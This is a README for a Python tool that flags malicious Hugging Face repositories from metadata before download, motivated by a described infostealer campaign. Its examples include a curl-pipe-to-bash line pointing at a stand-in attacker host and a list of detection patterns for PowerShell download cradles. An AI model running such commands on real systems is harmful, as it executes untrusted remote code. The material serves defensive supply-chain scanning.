# hf-model-provenance-scanner

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


> **Scan any Hugging Face repository for malicious signals _before_ the model is ever loaded.**  
> Zero runtime dependencies. Stdlib only. Works offline.

---

## The Attack That Prompted This Tool

**May 14, 2026, 06:00 UTC.** A repository called `Open-OSS/privacy-filter` appeared on Hugging Face. By midnight it had reached **#1 trending** with **244,000 downloads in 18 hours**.

The attack chain was three stages:

```
loader.py  →  PowerShell download cradle  →  Rust infostealer
```

1. The README told users to run `python loader.py`.
2. `loader.py` fetched a PowerShell script from a CDN.
3. The PowerShell script compiled and executed a Rust binary that exfiltrated SSH keys, AWS credentials, and browser cookies.

The repo was removed at 00:18 UTC the next day. By then it was too late for 244,000 pull operations.

**No existing tool would have caught this before a download.**

- **Garak** tests a loaded model's outputs, which is useless if you never wanted to load it.
- **ModelScan** detects pickle exploits _inside_ weight files; it can't flag `loader.py` or a missing SBOM.
- **Vigil / Rebuff** protect LLM _inputs_ at runtime, a completely different threat surface.

`hf-model-provenance-scanner` runs _before_ any file is downloaded and detects the metadata and structural signals of this class of attack.

---

## Quick Start

### As a library

```python
from hf_scanner.scanner import scan

# Populate from your own HF API call, a CI pipeline, or manual review.
repo_metadata = {
    "repo_id": "Open-OSS/privacy-filter",
    "author": "Open-OSS",
    "files": ["loader.py", "config.json", "README.md"],
    "readme": "Run: curl https://release.open-oss.io/setup.sh | bash",
    "downloads_24h": 244_000,
    "created_at": "2026-05-14T00:00:00Z",
    "author_repo_count": 0,
    "likes": 12,
}

result = scan(repo_metadata)
print(result.risk_level)       # 'CRITICAL'
print(result.recommendation)   # 'BLOCK'
print(result.risk_score)       # e.g. 95

for finding in result.findings:
    print(f"[{finding.severity}] {finding.title}")
```

### As a CLI

```bash
pip install hf-model-provenance-scanner

# From a JSON metadata file
hf-scan --meta repo_meta.json

# Pipe JSON from stdin
echo '{"repo_id":"Open-OSS/privacy-filter","author":"Open-OSS","files":["loader.py"],"downloads_24h":244000,"author_repo_count":0}' \
  | hf-scan

# Machine-readable JSON output
hf-scan --meta repo_meta.json --format json

# Exit codes:  0 = ALLOW,  1 = REVIEW,  3 = BLOCK
```
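
The exit codes make the CLI usable as a gate in a pipeline. A minimal sketch of such a gate follows, assuming `hf-scan` is on the `PATH`. The helper names are hypothetical, and treating any undocumented exit code as `BLOCK` (failing closed) is a design choice of this sketch, not documented behaviour of the tool.

```python
import subprocess

# Exit codes as documented above: 0 = ALLOW, 1 = REVIEW, 3 = BLOCK.
EXIT_CODE_TO_RECOMMENDATION = {0: "ALLOW", 1: "REVIEW", 3: "BLOCK"}


def recommendation_from_exit_code(code: int) -> str:
    """Translate an exit code; unknown codes fail closed as BLOCK."""
    return EXIT_CODE_TO_RECOMMENDATION.get(code, "BLOCK")


def gate(meta_path: str) -> str:
    """Run hf-scan on a metadata file and return its recommendation."""
    # check=False: a non-zero exit code is an expected result, not an error.
    proc = subprocess.run(["hf-scan", "--meta", meta_path], check=False)
    return recommendation_from_exit_code(proc.returncode)
```

A CI step could call `gate("repo_meta.json")` and refuse to continue unless the result is `"ALLOW"`.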

---

## Sample Terminal Output

```
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
 HF Model Provenance Scanner
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
  Repo   : Open-OSS/privacy-filter
  Scanned: 2026-05-14T06:32:11+00:00

  Risk Score  : [โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘โ–‘] 89/100
  Risk Level  : CRITICAL

โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘  ๐Ÿšซ  BLOCK  โ€” DO NOT LOAD THIS MODEL  โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

  Findings (7 total):
  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
   1. [CRITICAL ] Known malicious loader script: 'loader.py'
        Check   : code_execution
        Desc    : The file 'loader.py' has a name associated with malware
                  delivery loaders. The May 2026 attack used this filename.
        Evidence: file='loader.py'

   2. [CRITICAL ] curl-pipe-to-shell pattern detected
        Check   : code_execution
        Desc    : The README/model card contains an instruction that would
                  execute remote code on the user's machine.
        Evidence: snippet='curl https://release.open-oss.io/setup.sh | bash'

   3. [HIGH     ] Suspicious download velocity: 244,000 in 24 h
        Check   : metadata_trust
        Desc    : The repo received 244,000 downloads in its first 24 hours.
        Evidence: downloads_24h=244000, threshold=10000

   4. [HIGH     ] Very new repository: 0.3 days old
        Check   : metadata_trust
        Desc    : Repos younger than 7 days have no track record.
        Evidence: created_at='2026-05-14T00:00:00Z', age_days=0.3

   5. [MEDIUM   ] Author 'Open-OSS' has no other public repositories
        Check   : metadata_trust
        Evidence: author='Open-OSS', author_repo_count=0

   6. [MEDIUM   ] No trust artifacts (model card, SBOM, provenance)
        Check   : sbom_check
        Evidence: model_card=False, sbom=False, provenance=False

   7. [MEDIUM   ] Repository has no model weights but contains scripts
        Check   : pickle_exploit
        Evidence: script_files=['loader.py']

โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
```

---

## Checks Reference

### 1. `org_impersonation`: Brand impersonation detection

| What it detects | Why it matters |
|---|---|
| Author username within edit-distance ≤ 2 of a known-safe org | `0penai`, `micros0ft`, `meta_llama` fool humans at a glance |
| Verbatim boilerplate from a real org's model card | Attacker copies real marketing text to appear legitimate |

**Known-safe orgs:** `openai`, `meta-llama`, `google`, `microsoft`, `anthropic`, `mistralai`, `huggingface`, `stability-ai`, `cohere`, and more.

**Severity:** CRITICAL for any match.

---

### 2. `pickle_exploit`: Unsafe serialisation detection

| What it detects | Why it matters |
|---|---|
| `.pkl`, `.pt`, `.bin`, `.pth` files without `.safetensors` alternative | `torch.load()` on a pickle file = arbitrary code execution |
| `pickle.load()` / `torch.load()` / `np.load(allow_pickle=True)` in README | Instructs users to use the dangerous path |
| No model weights but scripts present | Delivery mechanism, not a real model |

**Severity:** HIGH for pickle-without-safetensors; INFO if safetensors is also present.
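
A minimal sketch of the file-extension part of this check, working only on the `files` list. The function name and the `(severity, filename)` return shape are hypothetical; the README-pattern and "no weights but scripts" rows are not covered here.

```python
from pathlib import PurePosixPath

# Extensions the table above lists as pickle-based weight formats.
PICKLE_SUFFIXES = {".pkl", ".pt", ".bin", ".pth"}


def pickle_findings(files: list[str]) -> list[tuple[str, str]]:
    """Return (severity, filename) pairs for pickle-format weight files."""
    suffixes = [PurePosixPath(name).suffix.lower() for name in files]
    has_safetensors = ".safetensors" in suffixes
    # HIGH when no safetensors alternative exists, INFO when one does.
    severity = "INFO" if has_safetensors else "HIGH"
    return [
        (severity, name)
        for name, suffix in zip(files, suffixes)
        if suffix in PICKLE_SUFFIXES
    ]


print(pickle_findings(["pytorch_model.bin", "config.json"]))
```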

---

### 3. `code_execution`: Executable script detection

| File / pattern | Severity |
|---|---|
| `loader.py`, `downloader.py`, `dropper.py`, `stager.py` | CRITICAL |
| `*.ps1`, `*.bat`, `*.cmd`, `*.vbs` | CRITICAL |
| `curl … \| bash`, `wget … \| sh` in README | CRITICAL |
| `IEX`, `Invoke-Expression`, `DownloadString` in README | CRITICAL |
| `install.sh`, `run.sh`, `*.exe`, `*.elf` | HIGH |
| `subprocess.run()`, `os.system()` in README | HIGH |
| `setup.py`, `Makefile` | MEDIUM |

---

### 4. `metadata_trust`: Account and velocity signals

| Signal | Threshold | Severity |
|---|---|---|
| Repo age | < 7 days | HIGH |
| Download velocity | > 10,000 in 24 h | HIGH |
| Author repo count | 0 other repos | MEDIUM |
| Like/download ratio |  50 (purchased likes) | LOW |
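
A sketch of three of these signals, using the thresholds shown in the sample terminal output (repos younger than 7 days, `threshold=10000` for 24-hour downloads). The function names are hypothetical, `now` is passed in explicitly so the result is reproducible, and the like/download ratio is not covered.

```python
from datetime import datetime, timezone

MAX_NEW_REPO_AGE_DAYS = 7     # "Repos younger than 7 days" in the sample output
MAX_DOWNLOADS_24H = 10_000    # "threshold=10000" in the sample output


def age_days(created_at: str, now: datetime) -> float:
    """Age of the repo in days, from an ISO-8601 UTC timestamp."""
    created = datetime.fromisoformat(created_at.replace("Z", "+00:00"))
    return (now - created).total_seconds() / 86_400


def trust_signals(meta: dict, now: datetime) -> list[tuple[str, str]]:
    """Return (severity, title) pairs for the signals present in meta."""
    findings = []
    if "created_at" in meta and age_days(meta["created_at"], now) < MAX_NEW_REPO_AGE_DAYS:
        findings.append(("HIGH", "very new repository"))
    if meta.get("downloads_24h", 0) > MAX_DOWNLOADS_24H:
        findings.append(("HIGH", "suspicious download velocity"))
    if meta.get("author_repo_count") == 0:
        findings.append(("MEDIUM", "author has no other public repositories"))
    return findings


scan_time = datetime(2026, 5, 14, 6, 32, 11, tzinfo=timezone.utc)
print(round(age_days("2026-05-14T00:00:00Z", scan_time), 1))
```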

---

### 5. `sbom_check`: Provenance artifact checks

| Artifact | Severity if missing |
|---|---|
| Model card (`README.md` with `model-index` YAML) | LOW |
| SBOM (`sbom.json`, `sbom.spdx`, `cyclonedx.json`) | INFO |
| Provenance (`provenance.json`, `attestation.json`) | INFO |
| All three missing together | MEDIUM (escalated) |
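
The escalation rule can be sketched as follows. Two things here are assumptions of the sketch: that the escalated MEDIUM finding replaces the three individual ones (the sample output shows a single finding for this check), and that a model card is recognised by the string `model-index` appearing in the README. The function name is hypothetical.

```python
SBOM_FILES = {"sbom.json", "sbom.spdx", "cyclonedx.json"}
PROVENANCE_FILES = {"provenance.json", "attestation.json"}


def sbom_findings(files: list[str], readme: str) -> list[tuple[str, str]]:
    """Return (severity, title) pairs for missing trust artifacts."""
    names = {name.rsplit("/", 1)[-1].lower() for name in files}
    has_card = "readme.md" in names and "model-index" in readme
    has_sbom = bool(names & SBOM_FILES)
    has_provenance = bool(names & PROVENANCE_FILES)

    # All three missing together: one escalated finding.
    if not (has_card or has_sbom or has_provenance):
        return [("MEDIUM", "no trust artifacts (model card, SBOM, provenance)")]

    findings = []
    if not has_card:
        findings.append(("LOW", "missing model card"))
    if not has_sbom:
        findings.append(("INFO", "missing SBOM"))
    if not has_provenance:
        findings.append(("INFO", "missing provenance"))
    return findings


print(sbom_findings(["loader.py", "config.json", "README.md"], "Run: python loader.py"))
```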

---

### 6. `supply_chain`: Dependency analysis

| Pattern | Severity |
|---|---|
| `--index-url` pointing away from PyPI | HIGH |
| Direct wheel/tarball URL installs | HIGH |
| Known typo-squatted package names | HIGH |
| `git+https://` dependencies | MEDIUM |
| `--extra-index-url` non-PyPI | MEDIUM |
| > 3 unpinned dependencies | LOW |
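
A rough sketch of how the `requirements` string might be classified line by line. The function names are hypothetical, "pinned" is taken to mean the line contains `==`, and "PyPI" is taken to mean the host `pypi.org`; both are assumptions. The typo-squat row is omitted because the list of known names is not given here.

```python
import re
from urllib.parse import urlparse


def _points_at_pypi(line: str) -> bool:
    """True if the option's URL argument has the host pypi.org."""
    parts = re.split(r"[=\s]+", line, maxsplit=1)
    url = parts[1] if len(parts) > 1 else ""
    return urlparse(url).hostname == "pypi.org"


def requirement_findings(requirements: str) -> list[tuple[str, str]]:
    """Return (severity, detail) pairs for risky requirement lines."""
    findings = []
    unpinned = 0
    for raw in requirements.splitlines():
        line = re.split(r"\s+#", raw, maxsplit=1)[0].strip()  # drop inline comments
        if not line or line.startswith("#"):
            continue
        if line.startswith("--index-url"):
            if not _points_at_pypi(line):
                findings.append(("HIGH", line))
        elif line.startswith("--extra-index-url"):
            if not _points_at_pypi(line):
                findings.append(("MEDIUM", line))
        elif line.startswith("git+https://"):
            findings.append(("MEDIUM", line))
        elif re.match(r"https?://\S+\.(?:whl|tar\.gz|zip)\b", line):
            findings.append(("HIGH", line))
        elif line.startswith("-"):
            continue  # other pip options are ignored in this sketch
        elif "==" not in line:
            unpinned += 1
    if unpinned > 3:
        findings.append(("LOW", f"{unpinned} unpinned dependencies"))
    return findings
```

Comparing the parsed hostname, instead of searching the line for the substring `pypi.org`, avoids being fooled by a lookalike host that merely contains that text.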

---

## Risk Scoring Formula

The 0–100 risk score uses **diminishing returns** so that one CRITICAL finding doesn't max out the score, but two or more CRITICAL findings definitely do.

```
score = min(100, Σ  severity_weight(i) × 1 / (1 + 0.15 × same_severity_count(i)))
```

Severity weights:

| Severity | Base weight |
|---|---|
| CRITICAL | 55 |
| HIGH | 35 |
| MEDIUM | 18 |
| LOW | 8 |
| INFO | 2 |

Score → risk level → recommendation:

| Score | Risk Level | Recommendation |
|---|---|---|
| 0 | SAFE | ALLOW |
| 1–15 | LOW | ALLOW |
| 16–35 | MEDIUM | REVIEW |
| 36–60 | HIGH | REVIEW |
| 61–100 | CRITICAL | BLOCK |

**Hard override:** Any CRITICAL-severity finding forces `recommendation = BLOCK`, regardless of score.
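
The formula, thresholds, and override can be sketched together as below. This is one reading of the formula, not the scanner's source: it assumes `same_severity_count(i)` is the number of earlier findings with the same severity (the reading under which one CRITICAL scores 55 and two reach the cap), and it assumes the total is rounded to the nearest integer. Function names are hypothetical.

```python
SEVERITY_WEIGHT = {"CRITICAL": 55, "HIGH": 35, "MEDIUM": 18, "LOW": 8, "INFO": 2}
DECAY = 0.15


def risk_score(severities: list[str]) -> int:
    """Sum severity weights with diminishing returns per severity level."""
    seen: dict[str, int] = {}
    total = 0.0
    for severity in severities:
        earlier = seen.get(severity, 0)  # earlier findings of this severity
        total += SEVERITY_WEIGHT[severity] / (1 + DECAY * earlier)
        seen[severity] = earlier + 1
    return min(100, round(total))


def risk_level(score: int) -> str:
    """Map a 0-100 score onto the risk levels in the table above."""
    if score == 0:
        return "SAFE"
    if score <= 15:
        return "LOW"
    if score <= 35:
        return "MEDIUM"
    if score <= 60:
        return "HIGH"
    return "CRITICAL"


def recommendation(severities: list[str]) -> str:
    """Apply the hard override first, then the score-based mapping."""
    if "CRITICAL" in severities:
        return "BLOCK"
    level = risk_level(risk_score(severities))
    return {"SAFE": "ALLOW", "LOW": "ALLOW", "MEDIUM": "REVIEW",
            "HIGH": "REVIEW", "CRITICAL": "BLOCK"}[level]


print(risk_score(["CRITICAL"]), recommendation(["CRITICAL"]))
```

The override matters in exactly this case: a single CRITICAL finding scores 55, which the table alone would map to HIGH and REVIEW.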

---

## `repo_metadata` Schema

```python
{
    # Required
    "repo_id":            str,   # "author/model-name"

    # Strongly recommended
    "author":             str,   # HF username or org slug
    "files":              list[str],  # filenames in the repo root
    "readme":             str,   # raw README.md content
    "created_at":         str,   # ISO-8601 UTC  "2026-05-14T00:00:00Z"
    "author_repo_count":  int,   # how many repos the author has
    "downloads_24h":      int,   # downloads in first 24 hours
    "downloads_last_month": int,
    "likes":              int,

    # Optional
    "requirements":       str,   # raw requirements.txt content
    "tags":               list[str],
    "last_modified":      str,   # ISO-8601 UTC
}
```

Apart from `repo_id`, all keys are optional. Missing keys are treated conservatively (worst-case assumption for trust signals).

---

## What No Other Tool Does

| Tool | What it does | What it misses |
|---|---|---|
| **Garak** | Red-teams a *loaded* model's output safety | Can't run before you download |
| **ModelScan** | Scans pickle bytecode inside weight files | Requires the file to be present; misses `loader.py` and a missing SBOM |
| **Vigil / Rebuff** | Detects prompt injection at *runtime* | Completely different threat surface |
| **PurpleLlama** | Model output safety benchmarks | Post-load evaluation only |
| **Agentic Radar** | Scans agentic workflow code | Not focused on model provenance |
| **hf-model-provenance-scanner** | **Pre-download supply-chain audit** | _This is the gap_ |

The core insight: **the May 2026 attack was detectable from metadata alone**, without downloading a single byte. `loader.py` + 244K downloads in 24h + zero-repo account + no model card = BLOCK. No existing tool made this call.

---

## Installation

```bash
# From PyPI (once published)
pip install hf-model-provenance-scanner

# From source
git clone https://github.com/poojakira/hf-model-provenance-scanner
cd hf-model-provenance-scanner
pip install -e ".[dev]"
```

**Requirements:** Python ≥ 3.11. Zero runtime dependencies.

---

## Development

```bash
# Run tests
python -m pytest tests/ -v

# Lint
ruff check src/ tests/

# Run the CLI against a sample payload
echo '{"repo_id":"Open-OSS/privacy-filter","author":"Open-OSS","files":["loader.py"],"downloads_24h":244000,"author_repo_count":0,"created_at":"2026-05-14T00:00:00Z"}' \
  | python -m hf_scanner.scanner
```

---

## License

MIT. See [LICENSE](LICENSE).

---

## Contributing

Pull requests welcome. Please add tests for any new check.  
Read [CONTRIBUTING.md](CONTRIBUTING.md) before opening a PR.